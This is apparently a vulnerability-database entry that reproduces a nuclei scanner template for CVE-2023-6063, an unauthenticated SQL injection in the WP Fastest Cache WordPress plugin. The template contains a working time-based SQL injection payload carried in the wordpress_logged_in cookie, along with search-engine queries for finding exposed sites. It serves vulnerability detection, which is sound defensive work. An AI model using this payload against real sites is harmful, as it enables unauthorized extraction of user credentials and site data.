WP Fastest Cache 1.2.2 - SQL Injection

🗓️ 02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | 🔗 github.com | 👁 161 Views

WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection. The WordPress plugin doesn't sanitize a parameter, leading to SQL injection.

id: CVE-2023-6063

info:
  name: WP Fastest Cache 1.2.2 - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
  impact: |
    Unauthenticated attackers can execute SQL injection to extract the complete WordPress database including user credentials and site data.
  remediation: Fixed in 1.2.2
  reference:
    - https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/
    - https://wordpress.org/plugins/wp-fastest-cache/
    - https://github.com/motikan2010/CVE-2023-6063-PoC
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6063
    - https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6063
    cwe-id: CWE-89
    epss-score: 0.73708
    epss-percentile: 0.99409
    cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wpfastestcache
    product: "wp_fastest_cache"
    framework: wordpress
    shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/"
    fofa-query: "body=/wp-content/plugins/wp-fastest-cache/"
    publicwww-query: "/wp-content/plugins/wp-fastest-cache/"
  tags: time-based-sqli,cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin,sqli,wpfastestcache,vuln
flow: |
    if (http(1)) {
        for (let i = 0; i < 2; i++) {
            http(2);
        }}

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "WP Fastest Cache")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND "tqKU"="tqKU

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(body, "/wp-")'
        condition: and
# digest: 4a0a004730450220032f9fa57bc0252bd47e236ef306aa4d83e4d8c0e263be22334d13fd02bc221b022100ac81a97bf2e2dfa76c953f448b275ef061daebbde9cc0fb79ba90909b405b437:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (current): Vulners AI Score 7.2 (High risk), CVSS 3.1 7.5, EPSS 0.73708